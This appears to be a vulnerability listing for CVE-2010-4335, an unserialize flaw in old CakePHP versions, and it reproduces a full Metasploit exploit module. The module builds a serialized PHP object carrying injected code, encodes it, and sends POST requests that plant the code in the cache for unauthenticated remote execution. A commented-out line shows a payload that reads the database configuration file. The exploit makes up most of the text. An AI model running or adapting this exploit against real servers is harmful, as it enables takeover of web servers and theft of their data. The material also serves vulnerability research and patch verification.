CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
AI Score
Confidence
Low
EPSS
Percentile
99.0%
CakePHP is a popular PHP framework for building web applications. The Security component of CakePHP versions 1.3.5 and earlier and 1.2.8 and earlier is vulnerable to an unserialize attack which could be abused to allow unauthenticated attackers to execute arbitrary code with the permissions of the webserver.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'CakePHP Cache Corruption Code Execution',
'Description' => %q{
CakePHP is a popular PHP framework for building web applications. The
Security component of CakePHP versions 1.3.5 and earlier and 1.2.8 and
earlier is vulnerable to an unserialize attack which could be abused to
allow unauthenticated attackers to execute arbitrary code with the
permissions of the webserver.
},
'Author' =>
[
'tdz',
'Felix Wilhelm', # poc
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'OSVDB', '69352' ],
[ 'CVE', '2010-4335' ],
[ 'BID', '44852' ],
[ 'PACKETSTORM', '95847' ]
],
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Payload' =>
{
'Space' => 4000,
# max url length for some old versions of apache according to
# http://www.boutell.com/newfaq/misc/urllength.html
'DisableNops' => true,
#'BadChars' => %q|'"`|, # quotes are escaped by PHP's magic_quotes_gpc in a default install
'Compat' =>
{
'ConnectionType' => 'find',
},
'Keys' => ['php'],
},
'Targets' => [ ['Automatic', { }], ],
'DefaultTarget' => 0,
'DisclosureDate' => '2010-11-15'
))
register_options(
[
OptString.new('URI', [ true, "CakePHP POST path", '/']),
OptString.new('OptionalPostData', [ false, "Optional POST data", '']),
])
end
def exploit
#path = rand_text_alphanumeric(rand(5)+5)
key = rand_text_alphanumeric(rand(5)+5)
fields = rand_text_alphanumeric(rand(5)+5)
#payload = "readfile('../config/database.php'); exit();"
len=payload.encoded.length + 6
p = ""
p << ':O:3:"App":4:{s:7:"__cache";s:3:"bam";s:5:"__map";a:2:{s:4'
p << ':"Core";a:1:{s:6:"Router";s:42:"../tmp/cache/persistent/cake_core_file_map";}'
p << 's:3:"Foo";s:'
p << len.to_s()
p << ':"<? '
p << payload.encoded
p << ' ?>";}s:7:"__paths";a:0:{}s:9:"__objects";a:0:{}}'
#rot13 and urlencode
p = p.tr("A-Ma-mN-Zn-z","N-Zn-zA-Ma-m")
p = CGI.escape(p)
data = "data%5b_Token%5d%5bkey%5d="
data << key
data << "&data%5b_Token%5d%5bfields%5d="
data << fields
data << p
data << "&_method=POST"
#some apps need the form post data
if datastore['OptionalPostData']
postdata = CGI.escape(datastore['OptionalPostData'])
data << "&"
data << postdata
end
print_status("Sending exploit request 1")
res = send_request_cgi(
{
'uri' => normalize_uri(datastore['URI']),
'method' => "POST",
'ctype' => 'application/x-www-form-urlencoded',
'data' => data
}, 5)
print_status("Sending exploit request 2")
res = send_request_cgi(
{
'uri' => normalize_uri(datastore['URI']),
'method' => "POST",
'ctype' => 'application/x-www-form-urlencoded',
'data' => data
},5)
print_status("Requesting our payload")
response = send_request_raw({
# Allow findsock payloads to work
'global' => true,
'uri' => normalize_uri(datastore['URI'])
}, 5)
handler
end
end